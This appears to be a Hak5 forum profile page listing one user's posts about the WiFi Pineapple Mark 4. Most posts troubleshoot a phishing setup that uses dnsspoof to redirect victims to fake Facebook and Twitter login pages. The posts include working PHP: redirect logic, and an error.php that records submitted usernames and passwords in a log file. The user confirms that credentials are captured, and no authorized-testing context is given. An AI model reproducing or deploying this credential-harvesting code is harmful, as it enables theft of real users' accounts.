Jump to content

SystemCrash86

Active Members
  • Posts

    254
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by SystemCrash86

  1. Thats great, just thought it might make a good module to add since there are other modules to see the packets (tcpdump) i thought driftnet would help to see the pictures
  2. I was wondering if a Driftnet module could be included because you have say tcpdump etc to see packets so why not have drifnet so you could see the packets that can be convered into pictures so you can see them. Just a thought.
  3. Is my redirect.php ok, its the one i download from the advanced phishing tutorial and replaced it with the redirect.php that was on the pineapple:
  4. I did a clean flash of the 2.7.5 firmware, not over serial though. I cleared all the history and cookies from my browser, i even downloaded and ran ccleaner like you suggested and opened up a command prompt and flushed my dns cache. But still nothing. I start dnsspoof and on my other computer i for example type "www.facebook.com" and it takes me to the real website everytime, not just facebook but all sites. But if i type say 172.16.42.1/facebook.htm in my browser it takes me to that facebook page set up on the pineapple where i can enter in my credentials and it is recorded. I do not understand why this is not working
  5. I have run into an unexpected issue while following the youtube tutorial Everything goes well and i follow the tutorial step-by-step without any errors. But my problem arises when i activate dnsspoof, it doesnt seem to redirect anyone going from facebook, blogger, twitter to my pineapple. But if i go on my other computer and in my url type "172.16.42.1/facebook.htm" or "172.16.42.1/twitter.htm" and so on i get the page like i should. I enter in my credentials and the pineapple records them in the log. Whats wrong with my dnsspoof becasue clearly everything else is working except that and i have done nothing different from the video. I have reflashed, factory reset the pineapple and uninstalled and reinstalled dnsspoof. What am i missing? Any and all help is greatly appreciated
  6. I am having problems using the opkg module from the pineapple bar in the wifi pineapple mark 4 with 2.7.5 firmware. Everytime i open up opkg manager everything loads except there is nothing in the table except for one line of text which reads "No data available in table" I have uninstalled, reinstalled, reflashed the pineapple and nothing. it works on my previous 2.7.0 firmware but since the update this is the only issue i am currently having. Any ideas?
  7. Yeah sorry my mistake, i mistyped that one. My bad sorry
  8. I swear it was there, i saw a screen shot of it in goolge images and now i cant seem to find it but i swear it was there. There is a glimpse to it in this short video https://www.youtube.com/watch?feature=player_detailpage&v=A4QD_wMC3VA but i cant find anymore screenshots
  9. I meant that with older versions of the pineapple interface there was a grep box area on the main page. In the new updates it has been removed. Just thought it might be easier if it was back again.
  10. The new firmware release are brilliant but i would like two changes to be considered for future releases. The first one would be if the kama log file could again be in reverse chronological order (the lastest on the top) becasue that would be so much easier. The second thing would be to have grep on the gui like it was before, becasue now you can ssh into the pineapple and do it there but what if it was back on the gui page and to me that would make things alot easier.
  11. Does it close ok? I bought some similar from amazon and the pineapple and battery pack fit in perfect - its just when i try to close the case that my problem arises. Having both in the case and trying to zip it up it wont close
  12. I did send an email to the Hakshop requesting the specs of it but since its christmas (at the time of this writing) i am not expecting a reply for a while, which is why i posted the question here.
  13. Yeah it probably is, but i was looking at the case thats currently being sold as the Wifi Pineapple Holiday Bundle because i like the way it looks and was hoping to get hold of that on its own but i have no idea the specifications for it which makes searching for it rather difficult. I would appreciate if someone could send me in the right direction
  14. I know that, i meant the new case with the zip
  15. Does anyone know where to get the new Wifi Pineapple case from? I have asked afew people and searched online but to no luck. I know that the Hak5shop is currently not selling the case on its own and since i have everything else - pineapple and battery pack - all i want is the case to tidy everything up. Has any got any ideas?
  16. Making progress. I made a file on my usb called phish (just to make things easier) and copied my face book and twitter templetes into it then editing facebook.html action=" <---------- put in action="error.php". Then I create symlinks by issuing the command ln -s /usb/phish/* /www/ from the pineapple interface and verifying they are there by issuing the command ls -la /www/ My edited redirect.php is: <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "facebook")){ header('Location: facebook.html'); } require('facebook.html'); ?>   My index.php remains untouched: <html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <body> </body> </html> And my error.php also remains untouched: <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("/pineapple/logs/phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><head> <script type="text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html>   I had to type the IP of the pineapple in my url bar because dnsspoof wouldn’t work at the moment and the template of facebook appears - this is progress as before nothing loading and kept refreshing. But the url does not read http://www.facebook.com/facebook.html like I’m told should happen, instead it says 172.16.42.1/redirect.php if I just type in the IP of the pineapple. I enter in my credentials and they show up in the pineapple/logs/phish.log So I’m making progress here.
  17. The Landing page in my pineapple is: <html> <head> <meta http-equiv="REFRESH" content=0;url=redirect.php"> </head> <body> </body> </html> This is from the tutorial i used But when ever i try to go to the page , in this case facebook.html which is also in the same folder as my redirect.php in the folder /www of my pineapple the page just is in a constant refresh loop and wont load any page
  18. I tried dns spoof both ways just to make sure and i get the same result. Yes i do have a facebook,html page and a redirect.php page in the /www/ folder of the pineapple
  19. Thats one of the tutorials i followed, everything goes ok until i open up a browser and try to go to the spoofed page or even 172.16.42.1 - the pages just keep refreshing on a loop with out loading and pages
  20. What do i edit redirect.php with? I have seen some tutorials and bits here and there but i dont know. Where abouts did you see this in the phishing forum? perhaps its something i havent tried yet
  21. I just tried the random roll and it worked. its just the phishing side that i cant get to work. I enabled random roll and spoofing host 172.16.42.1 * then on my other pc i typed in the ip of the pineapple and it worked, the page loaded to one of the random roll's modules and pressing f5 to refresh the page enable a new one to take over. So i know that dns spoof works. But i still cant figure out the phishing part
  22. I have the 2.7.0 firmware, i already updated the dns spoof module. I also did like you said and changed where it says redirect.php to facebook.html which is one of the folders i have symlinked there from the usb that is in the pineapple. The only thing that changed was in the url bar instead of saying http://172.16.42.1/redirect.php%22 it now says http://172.16.42.1/facebook.html%22 and the page refreshes very fast without loading the page
  23. yes i have used dns spoof before so i am familiar with how to use it and how it works and i have used ettercap all the time on my backtrack 5 r2 machine. but i am having issues with this on the pineapple and as i mentioned before. Have i got the redirect.php and index.php correct? I thought i had because of the tutorials i have seen but apparently not so i must be missing something. I would love other opinions. All help is greatly appreciated. Newbi3, dont worry you didnt insult me i am greatful for your help and opinions
  24. I seem to have a problem with dns spoof and phishing on the wifi pineapple mark 4 In spoof hosts i add: 172.16.42.1 * and i even tried 172.16.42.1 *.facebook.com with no difference. and the index.php page is: <html> <head> <meta http-equiv="REFRESH" content=0;url=redirect.php"> </head> <body> </body> </html> I followed loozr tutorial about phishing but whenever i try to go to facebook.com or any website the page just refreshes constantly with actually loading the page. and when i just type 172.16.42.1 into my browser on my other computer, with or with out dns spoof running it still refreshes the page rapidly without loading it with "http://172.16.42.1/redirect.php%22" in the url bar. winscp into the pineapple and in the www folder the redirect.php page is as so: <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "facebook")){ header('Location: facebook.html'); } require('error.php'); ?> If you need anymore information let me know. I am completely stumped by this. Hope someone can help
×
×
  • Create New...